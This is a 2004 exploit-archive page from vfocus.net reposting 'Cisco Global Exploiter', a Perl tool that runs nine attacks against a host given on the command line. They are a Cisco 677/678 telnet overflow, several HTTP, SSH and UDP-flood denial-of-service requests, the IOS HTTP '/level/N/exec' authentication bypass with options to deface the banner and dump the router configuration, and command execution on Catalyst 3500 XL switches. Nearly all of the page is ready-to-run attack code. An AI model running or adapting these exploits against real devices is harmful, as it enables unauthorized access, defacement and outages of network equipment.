首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Multiple Cisco Products Vulnerabilities Exploit
来源:vfocus.net 作者:vitter 发布时间:2004-04-02  

Multiple Cisco Products Vulnerabilities Exploit


#!/usr/bin/perl

##
# Cisco Global Exploiter
#
# Legal notes :
# The BlackAngels staff refuse all responsabilities
# for an incorrect or illegal use of this software
# or for eventual damages to others systems.
#
# www blackangels it
##

############
# Modules ##
############

use Socket;
use IO::Socket;


#########
# Main ##
#########

$host = "";
$expvuln = "";
$host = @ARGV[ 1 ];
$expvuln = @ARGV[ 3 ];

if ($host eq "") {
usage();
}
if ($expvuln eq "") {
usage();
}
if ($expvuln eq "1") {
cisco1();
}
elsif ($expvuln eq "2") {
cisco2();
}
elsif ($expvuln eq "3") {
cisco3();
}
elsif ($expvuln eq "4") {
cisco4();
}
elsif ($expvuln eq "5") {
cisco5();
}
elsif ($expvuln eq "6") {
cisco6();
}
elsif ($expvuln eq "7") {
cisco7();
}
elsif ($expvuln eq "8") {
cisco8();
}
elsif ($expvuln eq "9") {
cisco9();
}
else {
printf "\nInvalid vulnerability number ...\n\n";
exit(1);
}


##############
# Functions ##
##############

sub usage
{
printf "\nUsage :\n";
printf "perl cge.pl -h <host> -v <vulnerability number>\n\n";
printf "Vulnerabilities list :\n";
printf "[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability\n";
printf "[2] - Cisco IOS Router Denial of Service Vulnerability\n";
printf "[3] - Cisco IOS HTTP Auth Vulnerability\n";
printf "[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability\n";
printf "[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability\n";
printf "[6] - Cisco 675 Web Administration Denial of Service Vulnerability\n";
printf "[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability\n";
printf "[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability\n";
printf "[9] - Cisco 514 UDP Flood Denial of Service Vulnerability\n\n";
exit(1);
}

sub cisco1 # Cisco 677/678 Telnet Buffer Overflow Vulnerability
{
my $serv = $host;
my $dch = "?????????????????a~ %%%%%XX%%%%%";
my $num = 30000;
my $string .= $dch x $num;
my $shc="\015\012";

my $sockd = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $serv,
PeerPort => "(23)",
) || die("No telnet server detected on $serv ...\n\n");

$sockd->autoflush(1);
print $sockd "$string". $shc;
while (<$sockd>){ print }
print("\nPacket sent ...\n");
sleep(1);
print("Now checking server's status ...\n");
sleep(2);

my $sockd2 = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $serv,
PeerPort => "(23)",
) || die("Vulnerability successful exploited. Target server is down ...\n\n");

print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
exit(1);
}

sub cisco2 # Cisco IOS Router Denial of Service Vulnerability
{
my $serv = $host;

my $sockd = IO::Socket::INET->new (
Proto=>"tcp",
PeerAddr=>$serv,
PeerPort=>"http(80)",);
unless ($sockd){die "No http server detected on $serv ...\n\n"};
$sockd->autoflush(1);
print $sockd "GET /\%\% HTTP/1.0\n\n";
-close $sockd;
print "Packet sent ...\n";
sleep(1);
print("Now checking server's status ...\n");
sleep(2);

my $sockd2 = IO::Socket::INET->new (
Proto=>"tcp",
PeerAddr=>$serv,
PeerPort=>"http(80)",);
unless ($sockd){die "Vulnerability successful exploited. Target server is down ...\n\n"};

print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
exit(1);
}

sub cisco3 # Cisco IOS HTTP Auth Vulnerability
{
my $serv= $host;
my $n=16;
my $port=80;
my $target = inet_aton($serv);
my $fg = 0;

LAB: while ($n<100) {
my @results=exploit("GET /level/".$n."/exec/- HTTP/1.0\r\n\r\n");
foreach $line (@results){
$line=~ tr/A-Z/a-z/;
if ($line =~ /http\/1\.0 401 unauthorized/) {$fg=1;}
if ($line =~ /http\/1\.0 200 ok/) {$fg=0;}
}

if ($fg==1) {
sleep(2);
print "Vulnerability unsuccessful exploited with $n ...\n\n\r";
}
else {
sleep(2);
print "Vulnerability successful exploited with $n ...\n\n\r";
last LAB;
}

$n++;

sub exploit {
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Unable to initialize socket ...\n\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
my @in;
select(S);
$|=1;
print $pstr;
while(<S>){ push @in, $_;}
select(STDOUT); close(S); return @in;
}
else { die("No http server detected on $serv ...\n\n"); }
}
}
exit(1);
}

sub cisco4 # Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
{
my $serv = $host;
my $n = 16;

while ($n <100) {
exploit1("GET /level/$n/exec/- HTTP/1.0\n\n");
$wr =~ s/\n//g;
if ($wr =~ /200 ok/) {
while(1)
{ print "\nVulnerability could be successful exploited. Please choose a type of attack :\n";
print "[1] Banner change\n";
print "[2] List vty 0 4 acl info\n";
print "[3] Other\n";
print "Enter a valid option [ 1 - 2 - 3 ] : ";
$vuln = <STDIN>;
chomp($vuln);

if ($vuln == 1) {
print "\nEnter deface line : ";
$vuln = <STDIN>;
chomp($vuln);
exploit1("GET /level/$n/exec/-/configure/-/banner/motd/$vuln HTTP/1.0\n\n");
}
elsif ($vuln == 2) {
exploit1("GET /level/$n/exec/show%20conf HTTP/1.0\n\n");
print "$wrf";
}
elsif ($vuln == 3)
{ print "\nEnter attack URL : ";
$vuln = <STDIN>;
chomp($vuln);
exploit1("GET /$vuln HTTP/1.0\n\n");
print "$wrf";
}
}
}
$wr = "";
$n++;
}
die "Vulnerability unsuccessful exploited ...\n\n";

sub exploit1 {
my $sockd = IO::Socket::INET -> new (
Proto => 'tcp',
PeerAddr => $serv,
PeerPort => 80,
Type => SOCK_STREAM,
Timeout => 5);
unless($sockd){die "No http server detected on $serv ...\n\n"}
$sockd->autoflush(1);
$sockd -> send($_[0]);
while(<$sockd>){$wr .= $_} $wrf = $wr;
close $sockd;
}
exit(1);
}

sub cisco5 # Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
{
my $serv = $host;
my $port = 22;
my $vuln = "a%a%a%a%a%a%a%";

my $sockd = IO::Socket::INET->new (
PeerAddr => $serv,
PeerPort => $port,
Proto => "tcp")
|| die "No ssh server detected on $serv ...\n\n";

print "Packet sent ...\n";
print $sockd "$vuln";
close($sockd);
exit(1);
}

sub cisco6 # Cisco 675 Web Administration Denial of Service Vulnerability
{
my $serv = $host;
my $port = 80;
my $vuln = "GET ? HTTP/1.0\n\n";

my $sockd = IO::Socket::INET->new (
PeerAddr => $serv,
PeerPort => $port,
Proto => "tcp")
|| die "No http server detected on $serv ...\n\n";

print "Packet sent ...\n";
print $sockd "$vuln";
sleep(2);
print "\nServer response :\n\n";
close($sockd);
exit(1);
}

sub cisco7 # Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
{
my $serv = $host;
my $port = 80;
my $k = "";

print "Enter a file to read [ /show/config/cr set as default ] : ";
$k = <STDIN>;
chomp ($k);
if ($k eq "")
{$vuln = "GET /exec/show/config/cr HTTP/1.0\n\n";}
else
{$vuln = "GET /exec$k HTTP/1.0\n\n";}

my $sockd = IO::Socket::INET->new (
PeerAddr => $serv,
PeerPort => $port,
Proto => "tcp")
|| die "No http server detected on $serv ...\n\n";

print "Packet sent ...\n";
print $sockd "$vuln";
sleep(2);
print "\nServer response :\n\n";
while (<$sockd>){print}
close($sockd);
exit(1);
}

sub cisco8 # Cisco IOS Software HTTP Request Denial of Service Vulnerability
{
my $serv = $host;
my $port = 80;
my $vuln = "GET /error?/ HTTP/1.0\n\n";

my $sockd = IO::Socket::INET->new (
PeerAddr => $serv,
PeerPort => $port,
Proto => "tcp")
|| die "No http server detected on $serv ...\n\n";

print "Packet sent ...\n";
print $sockd "$vuln";
sleep(2);
print "\nServer response :\n\n";
while (<$sockd>){print}
close($sockd);
exit(1);
}

sub cisco9 # Cisco 514 UDP Flood Denial of Service Vulnerability
{
my $ip = $host;
my $port = "514";
my $ports = "";
my $size = "";
my $i = "";

print "Input packets size : ";
$size = <STDIN>;
chomp($size);

socket(SS, PF_INET, SOCK_DGRAM, 17);
my $iaddr = inet_aton("$ip");

for ($i=0; $i<10000; $i++)
{send(SS, 0, $size, sockaddr_in($port, $iaddr));}

printf "\nPackets sent ...\n";
sleep(2);
printf "Please enter a server's open port : ";
$ports = <STDIN>;
chomp $ports;
printf "\nNow checking server status ...\n";
sleep(2);

socket(SO, PF_INET, SOCK_STREAM, getprotobyname('tcp')) || die "An error occuring while loading socket ...\n\n";
my $dest = sockaddr_in ($ports, inet_aton($ip));
connect (SO, $dest) || die "Vulnerability successful exploited. Target server is down ...\n\n";

printf "Vulnerability unsuccessful exploited. Target server is still up ...\n\n";
exit(1);
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·GV Local Buffer Overflow Explo
·Tcpdump ISAKMP Identification
·BlackJumboDog FTP Server Buffe
·FirstClass Desktop 7.1 buffer
·AOL Instant Messenger AIM Away
·Panda ActiveScan Control Remot
·Mac OS X<=10.3.3 AppleFileS
·Monit <= 4.1 Remote Root Ex
·GV PostScript Viewer Remote Bu
·Proof-of-concept exploit code
·LibPNG Graphics Library Remote
·RogerWilco 0.4 remote exploit
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved